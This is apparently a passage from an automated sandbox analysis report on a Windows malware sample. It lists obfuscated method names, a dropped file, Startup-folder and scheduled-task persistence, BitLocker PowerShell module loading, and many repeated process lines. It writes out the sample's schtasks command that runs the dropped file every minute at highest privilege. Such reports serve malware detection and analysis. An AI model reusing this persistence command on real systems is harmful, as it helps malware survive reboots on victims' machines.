'nwzvWb72heLEIm36XKcK1ps9oniHQOPpR5bf8DQJi7EdxPPOxT958EI005Dhz', 'GU74TOqaIOzQMZuKOUhvDH1PUeOdJYbTBA738MLfWV3xnUpToDdmtpTev54zD', 'OnQ78zI86ZDw8jrV3uq8wiZsAzwqry6mVAZOSLsa8awROREW9DCUCQKPdZwfK'
            Source: SYSTEM.0.dr, Znq7W6ddJes0wWEvAr9p24rge6LWO3pHNDfLWAtB2lVKj0l1w2v4p9TAa0mF9315Sx8FykofoXboFiw0XceUJRLu7tmfb.csHigh entropy of concatenated method names: 'O5TT1A6jiLuTNwTkBMsgSMTAgjRx4ZZEubohlLtqTG0tLu4WKfgBOJqZQ7aInLIHlXDoLlGT31PWK42AvgUTOitwEbqEo', 'xR4ZEh9ioGZg8aLEsy8kDq9hFF6eXWjjw2YlQ5ChgtyhHECZPso3lPKTqLyyqXnzQmYeJMllCzRvR68ZG34LcSI0XSy1F', 'EGdk2Mq50zRoGVBFNd2oQXST1kMitbJoNZjeiQxrpiagLkqmX2bWkXbsPDCtOZ3mtxNFmohbzsTSiyAtagHoD9xNmlcNx', '_8ULx8qcy11Chdwwu3GMNms0DVG18YI7iy28np9W1glUPvtuSMmeHBHxAcQ9TrokHIKG5ikXTE4jSzgOKrMj3wIU9DY0J0', 'f0GtyoyLB99QllQw9YnYW', 'gyih2PP8WNAyjFWhZhxoU', 'Mf3jPI62c1iisZCPytiN1', '_3LOHknG1TMYF4V7S4mZNg', 'oA8dVoPl4Zf7gJRZ1zUDE', 'mqp6SPsUu0tNf4dbRbP4i'
            Source: SYSTEM.0.dr, dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.csHigh entropy of concatenated method names: 'xiVa5oynKRJwZgEnkCPDvoezL6L0gDdME8UmyXsqaoJwJOv48BQqRYiAWdPDR993CrdGLHNGxxvbujkmks9ROIfxrJVPq', 'NpcArRkfjCMFixRJe3XB5CmYKS0LlmBerP6bWX9zW4kBx8YkH5EMdsoC4HHChyeOquHBQ5L4emZuL0zmAJe22UQOYwKgj', 'NRlN0K7tXtcwELx73tnkiRUnuVNOHCIlqpYBNWQEfv5y6CN7moktI2Sw0hUGFN5KpuUiwLnbRCpF1wSsoBAH6205MRs6v', 'VRi6nEPzmZHkdaxkAWNeZmhB2yYQxaQeNsSdCtVUsaOc1sRZbNGx2MsoIsQQbobe7BxGdfp8RVgJdzUOO6RWqiXfJEVJv', '_3F6D2cvTriqXOdNlH4VUyN5XGg02Y8b2RNSbQCRjXStt8Ljavgm3AzX5XZWMCd3H7hZzFANdiiRGZ5V3vjjfK33x8WYuK', 'QFnyDcSSyyn4hh5vVzBbaItdIiNsmfQ0A2ICK3hcS491Gq5iHxEZq0QGyfFdg5quL95UKFNukppnqTmCRWVFU6mA6GiVY', 'mOj2Zkx9VgoYHyrWS33F5wHBnT9bIpw4JayNBXyZTmVbkYAdTWDCqRdd5Y1rtFtNFPpd4kQhNKdPLRR1ZC6nMNuJPO2qR', 'pepmqv2VWndNyFEEFAO5962QhQHCENPlsF6TigDpNvePmHwGSovdl2qctXjLWQKMgouEe5jekQx5wprJbWp7KtRP8X8wD', '_8NT7lINrwdwexoQOv1qi8CtgxaiIwRPAgZgQXzxRReFJ5yE7eBRd6hRnL0RHm4Uf6JJxTtSNsx0pIti9ItW5F5gHa4yMW', 'TF0RbxnECYnXqQnIZKsp0geYDV4tLJAdwwxmHNJEd4FZIufmwnDogmm7mqCkY2ROHxoveQ7zvtyrYAc50sA77uWoo56Ft'
            Source: SYSTEM.0.dr, 3GqSiOnMczjgnrSizD1bqVUyz5ANfue2d6tIc52d6Q6kfRkXS7pQiPq5sulpXTR3XkYNBnSXSDUCkM7An4EQJVED6GVGo.csHigh entropy of concatenated method names: 'bjtSMovcuXuwdSIC5roMyRk9ncsYgA1WxQ09cgnQgGOOI8EtoShTEwMRbRZasRvX8D8Ne40cpgIOmsx8g1VLmS4tzPa9u', 'HubpJOl2ESbadRN3k7skn', 'zf47TkcdgvU1IG5yRCu2X', 'TEHtli70EyH48XRIyLnUX', 'fZDnMqPdsJkpIjXB4PTbm'
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile created: C:\Users\user\AppData\Roaming\SYSTEMJump to dropped file
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile created: C:\Users\user\AppData\Roaming\SYSTEMJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnkJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnkJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
